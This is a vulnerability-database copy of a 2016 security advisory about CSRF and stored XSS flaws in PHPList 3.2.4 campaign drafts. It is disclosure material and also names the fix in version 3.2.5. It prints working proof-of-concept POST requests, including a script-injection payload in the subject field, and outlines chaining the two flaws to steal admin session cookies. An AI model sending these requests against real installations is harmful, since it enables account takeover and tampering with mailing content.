Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

🗓️ 01 Jun 2016 00:00:00Reported by Mickael DorignyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 43 Views

PHPList 3.2.4 CSRF/XSS vulnerabilities in campaign drafts

Code
`######################################################################  
# Exploit Title: PHPList v3.2.4 CSRF/XSS  
# Date: 01/06/2016  
# Author: Mickael Dorigny @ Synetis  
# Vendor or Software Link: https://www.phplist.com/  
# Version: 3.2.4  
# Category: CSRF/XSS  
######################################################################  
  
PHPList description :  
======================================================================  
phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news, advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source software subject to the terms of the Affero General Public License (AGPL).  
  
Vulnerabilities description :  
======================================================================  
phpList version 3.2.4 is vulnerable to multiple vulnerabilities like :  
- CSRF  
- Stored XSS  
  
Poc n°1 : CSRF on Campaign Draft modification  
============================================  
The draft modification process is vulnerable to CSRF attack. When using the form, we can see that a form anti-CSRF token is used but it can be removed from the request wihtout causing error. The only prerequisite to exploit this CSRF is to target an existing Draft ID. This can be done with a simple code tricks wich send multiple modification requests while incremeting the Draft ID for example. To modify the Draft 5, use the following parameters :  
  
[URL]  
http://server/admin/?page=send&id=5  
[POSTDATA]  
workaround_fck_bug=1&followupto=&subject=MODIFIED_SUBJECT&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=  
  
This vulnerability can make an authenticated user change campaign content an alter user experience.  
  
PoC n°2 : Stored XSS on Campaign Draft Name  
============================================  
The campaign draft name, displayed when listing all campaign draft, is vulnerable to Stored XSS attack. This mean that the vulnerable code is saved in the database and displayed each time a admin/user go on the campaign draft list :  
http://server/admin/?page=messages&tab=draft  
  
The following request exploit this vulnerability :   
  
[URL]  
http://server/admin/?page=send&id=5  
[POSTDATA]  
workaround_fck_bug=1&followupto=&subject=DATA"><script>alert("XSS_again")</script>&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=  
  
Note that once this request is submitted, the user is not directly on the page that display the XSS. He have to go on this page : http://server/admin/?page=messages&tab=draft  
  
Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones.   
  
Using two simple HTML page with auto JavaScript redirection, an attacker can exploit these two vulnerabilities to change the campaign draft content to make it display a Javascescript instruction and then use this Javascript execution to steal session cookie or bypass all other anti-CSRF protection of the PHPlist installation. The scenario exploiting this two vulnerabilities is presented in the video in "Addtional resources" section.  
  
Solution:   
======================================================================  
- Update your PHPList installation to superior version (3.2.5 - https://www.phplist.org/newslist/phplist-3-2-5-whats-new/)  
  
Additional resources :  
======================================================================  
- https://youtu.be/cU6ob4sCKgs  
- https://www.phplist.org/newslist/phplist-3-2-5-whats-new/  
  
Report timeline :  
======================================================================  
2016-05-11 : Advisory submitted to editor  
2016-05-26 : Version 3.2.5 released with fixes  
2016-06-01 : Public Advisory release  
  
Credits :  
======================================================================  
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr  
  
My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/  
  
--  
SYNETIS   
CONTACT: www.synetis.com | www.information-security.fr  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jun 2016 00:00Current
phplistcsrfxssvulnerabilitycampaign draftssecurityupdateanti-csrfstored xss
43